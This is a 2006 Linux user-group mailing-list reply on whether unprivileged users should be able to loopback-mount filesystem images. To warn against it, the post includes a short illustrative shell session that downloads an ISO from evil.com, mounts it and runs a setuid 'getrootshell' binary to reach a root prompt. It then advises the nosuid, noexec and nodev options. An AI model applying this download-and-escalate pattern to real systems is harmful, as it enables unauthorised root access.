bergman on 16 Nov 2006 22:54:48 -0000

Re: [PLUG] loopback mounting fs images

In the message dated: Thu, 16 Nov 2006 17:24:07 EST,
The pithy ruminations from Jeff Abrahamson on
<[PLUG] loopback mounting fs images> were:
=>

=>
=> Mount in general denies its services to non-privileged users unless
=> explicit authorization is made in /etc/fstab.
=>
=> I'd like to be able to mount filesystem images from an already mounted
=> filesystem without having to authorize myself specially.  I don't

By "filesystem images from an already mounted filesystem" do you mean that an
image already exists as a file on the machine?

=> think this is possible, but I'm curious (1) if I'm wrong and it is
=> possible, and (2) what the security concerns of this would be as long
=> as mount restricted me to mounting files I own on mount-points I own
=> and didn't permit files in the newly mounted fs to have permissions or
=> ownership that I couldn't otherwise give them.

I don't understand the last part "as long as mount...didn't permit files in the
newly mounted fs to have permissions or ownership that I couldn't otherwise
give them". AFAIK, mount(8) doesn't have that kind of control. You can get some
of what you want with the "nosuid" option, but I don't believe that mount will
change the ownership of files to match the person doing the mounting.

Of course, mount has a gazillion options, depending on the specific filesystem
type that you are mounting, and how well those filesystem semantics translate
to your OS.

You may want to consider FUSE (http://fuse.sourceforge.net/) and the Mountlo
project. [DISCLAIMER]I haven't actually used FUSE.[/DISCLAIMER]

Otherwise, it's all to easy to do:

	joeuser% cd /tmp
	joeuser% wget -nd http://evil.com/downloads/crackertools.iso
	joeuser% mkdir /tmp/mymountpoint
	joeuser% mount /tmp/crackertools.iso /tmp/mymountpoint -t iso9660 -o loop=/dev/loop3,blocksize=1024
	joeuser% ls -l /tmp/mymountpoint
	-rws--x--x  1 root bin   106924 Jan  9  2004 getrootshell
	joeuser% /tmp/mymountpoint/getrootshell
	joeuser#

[the exercise of gaining root when you own device files is a bit more tricky,
but quite possible].

Seriously, if you're going to permit users to mount file systems,
enforce the "noexec" and "nosuid" and "nodev" options.

Mark

=>
=>  Jeff
=>
=>  Jeff Abrahamson  <http://jeff.purple.com/>          +1 215/837-2287
=>  GPG fingerprint: 1A1A BA95 D082 A558 A276  63C6 16BF 8C4C 0D1D AE4B
=>
=> --zS7rBR6csb6tI2e1
=>